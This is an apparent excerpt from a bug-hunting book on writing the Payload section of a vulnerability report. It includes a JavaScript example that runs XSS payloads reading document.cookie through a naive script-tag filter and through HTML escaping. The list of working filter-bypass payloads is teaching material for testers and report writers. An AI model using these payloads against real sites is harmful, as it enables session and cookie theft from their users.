Hands-On Bug Hunting for Penetration Testers

Payload

The XSS snippet we used to successfully execute JavaScript goes here. For SQLi, a successful password attack, or any other payload-based attack, the equivalent data (the injected string, the credential pair, and so on) is required as well. If you come across multiple working payload types in one discovery, include however many of them illustrate the general sanitization rule that is being misapplied:

<a onmouseover="alert(document.cookie)">xxs link</a>
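As an added example (not code from the book), the following shows what "several payloads that illustrate the misapplied sanitization rule" looks like in practice. It assumes a hypothetical target filter, `naiveSanitize`, that strips `<script>` blocks and the literal string `javascript:` but leaves inline event handlers alone; the payload list and the escaping function are constructed for this example. Running the candidate payloads through the filter and keeping the ones that remain executable gives exactly the set worth listing in the report's Payload section, since together they point at one root cause: the filter blocks a tag name instead of neutralizing executable attributes.

```javascript
// Added example, not from the book. Hypothetical target filter: removes
// <script> blocks and the string "javascript:", case-insensitively, and
// nothing else. This is the kind of deny-list a vulnerable app might run.
function naiveSanitize(input) {
  return input
    .replace(/<script\b[^>]*>[\s\S]*?<\/script>/gi, "")
    .replace(/javascript:/gi, "");
}

// The correct approach for untrusted text rendered into HTML: encode the
// metacharacters so the browser treats the whole string as text.
function escapeHtml(input) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return input.replace(/[&<>"']/g, c => map[c]);
}

// Rough check: does the filtered output still contain something a browser
// would execute? A <script> tag, an on* handler inside a tag, or a
// javascript: URL in an href.
function stillExecutable(html) {
  return /<script\b/i.test(html)
    || /<\w+[^>]*\bon\w+\s*=/i.test(html)
    || /href\s*=\s*["']?\s*javascript:/i.test(html);
}

// Constructed candidate payloads. The first is the one the filter was
// written for; the rest probe whether the rule is "no <script>" or
// "no executable content".
const payloads = [
  '<script>alert(document.cookie)</script>',
  '<a onmouseover="alert(document.cookie)">xxs link</a>',
  '<img src=x onerror="alert(document.cookie)">',
  '<svg onload="alert(document.cookie)">',
  '<a href="javascript:alert(1)">x</a>',
];

// Run every candidate through a filter and keep those that still execute.
function survivingPayloads(filter, candidates) {
  return candidates.filter(p => stillExecutable(filter(p)));
}

// Build the text of the report's Payload section from the survivors.
function payloadSection(survivors) {
  if (survivors.length === 0) return "Payload\n\n(no working payload)";
  return "Payload\n\n" + survivors.map(p => "    " + p).join("\n");
}

// Stand-alone run: the naive filter lets every event-handler payload
// through, the escaping approach lets nothing through.
console.log(payloadSection(survivingPayloads(naiveSanitize, payloads)));
console.log(payloadSection(survivingPayloads(escapeHtml, payloads)));
```

The three surviving payloads differ in tag and handler but share one property, an inline event-handler attribute, which is the sentence to write next to them in the report: the filter matches on the `<script>` tag name rather than on executable attributes, so any tag that accepts an `on*` handler bypasses it.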